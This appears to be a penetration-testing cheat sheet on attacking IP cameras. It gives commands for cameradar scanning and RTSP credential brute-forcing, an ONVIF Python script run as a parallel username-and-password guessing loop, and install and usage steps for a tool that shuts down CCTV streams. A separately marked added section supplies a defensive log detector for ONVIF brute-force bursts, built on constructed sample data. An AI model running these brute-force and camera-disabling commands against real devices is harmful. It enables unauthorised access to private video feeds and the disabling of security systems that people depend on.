git clone https://github.com/Ullaakut/cameradar
cd cameradar
# scan for default ports
docker run --net=host -t ullaakut/cameradar -t $ip
# bruteforce
docker run -t ullaakut/cameradar -t $ip -p $port -T 3s -s 3 -d
# with custom wordlist
docker run -t -v /usr/share/seclists/Passwords/Common-Credentials:/tmp/dictionaries ullaakut/cameradar -c "/tmp/dictionaries/10-million-password-list-top-1000000.json" -t $ip
ONVIF
If you receive a long XML response, the device supports the ONVIF protocol. ONVIF has no standard port; it is usually found on ports 8899, 80, 8080, 5000 or 6688.
# python script
from onvif import ONVIFCamera
mycam = ONVIFCamera('192.168.0.2', 80, 'user', 'passwd', '/etc/onvif/wsdl/')
# Get Hostname
resp = mycam.devicemgmt.GetHostname()
print("My camera's hostname: " + str(resp.Name))
# Get system date and time
dt = mycam.devicemgmt.GetSystemDateAndTime()
tz = dt.TimeZone
year = dt.UTCDateTime.Date.Year
hour = dt.UTCDateTime.Time.Hour
Bruteforce
Python script:
import sys
from onvif import ONVIFCamera
# argv: host, port, optional username, optional password
if len(sys.argv) < 4:
    user = ''
else:
    user = sys.argv[3]
if len(sys.argv) < 5:
    password = ''
else:
    password = sys.argv[4]
mycam = ONVIFCamera(sys.argv[1], sys.argv[2], user, password, '/usr/local/lib/python3.9/site-packages/wsdl/')
# Device information is only returned when the credentials are accepted
resp = mycam.devicemgmt.GetDeviceInformation()
print(str(resp))
Launch it:
parallel -j2 -a usernames.txt -a passwords.txt 'python3 bruteforcer.py $ip $port 2>/dev/null {1} {2}'
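Seen from the monitoring side, the loop above is a burst of failed POSTs to the ONVIF device service from a single address. The following added example (not part of the original notes or of any tool named here) flags that pattern in access-log lines; the reverse proxy writing common log format, the failure status codes, the threshold and the sample lines are all assumptions constructed for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

ONVIF_PATH = "/onvif/device_service"   # default ONVIF device-management endpoint
FAIL_CODES = {"400", "401", "403"}     # assumption: how the device answers bad credentials
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "POST (\S+) [^"]*" (\d{3}) ')


def _line(ip, clock, status):
    """Build one constructed access-log line (common log format)."""
    return f'{ip} - - [12/Mar/2024:{clock} +0000] "POST {ONVIF_PATH} HTTP/1.1" {status} 512'


# Constructed sample: one source guessing quickly, one operator typo, one slow client.
SAMPLE_LOG = [
    _line("198.51.100.7", "10:00:01", 401),
    _line("198.51.100.7", "10:00:02", 401),
    _line("192.0.2.10", "10:00:02", 401),
    _line("198.51.100.7", "10:00:03", 401),
    _line("198.51.100.7", "10:00:04", 401),
    _line("198.51.100.7", "10:00:05", 401),
    _line("192.0.2.10", "10:00:08", 200),
    _line("203.0.113.9", "10:05:00", 401),
    _line("203.0.113.9", "10:10:00", 401),
]


def detect_onvif_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: time its failures first reached threshold inside window}."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a POST or not in the expected format
        ip, stamp, path, status = m.groups()
        if path != ONVIF_PATH or status not in FAIL_CODES:
            continue
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        hits = recent[ip]
        hits.append(when)
        while when - hits[0] > window:   # drop failures older than the window
            hits.popleft()
        if len(hits) >= threshold:
            alerts.setdefault(ip, when)
    return alerts


if __name__ == "__main__":
    for ip, when in detect_onvif_bruteforce(SAMPLE_LOG).items():
        print(f"{when.isoformat()} possible ONVIF credential guessing from {ip}")
```

Tune threshold and window to the camera's normal client behaviour; NVRs that retry with stale credentials produce the same signature.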
Shut down CCTV
# install
export GO111MODULE=on
go get github.com/ullaakut/camerattack@latest
cd $GOPATH/src/github.com/ullaakut/camerattack
go install
# usage
camerattack rtsp://0.0.0.0:8554/live.sdp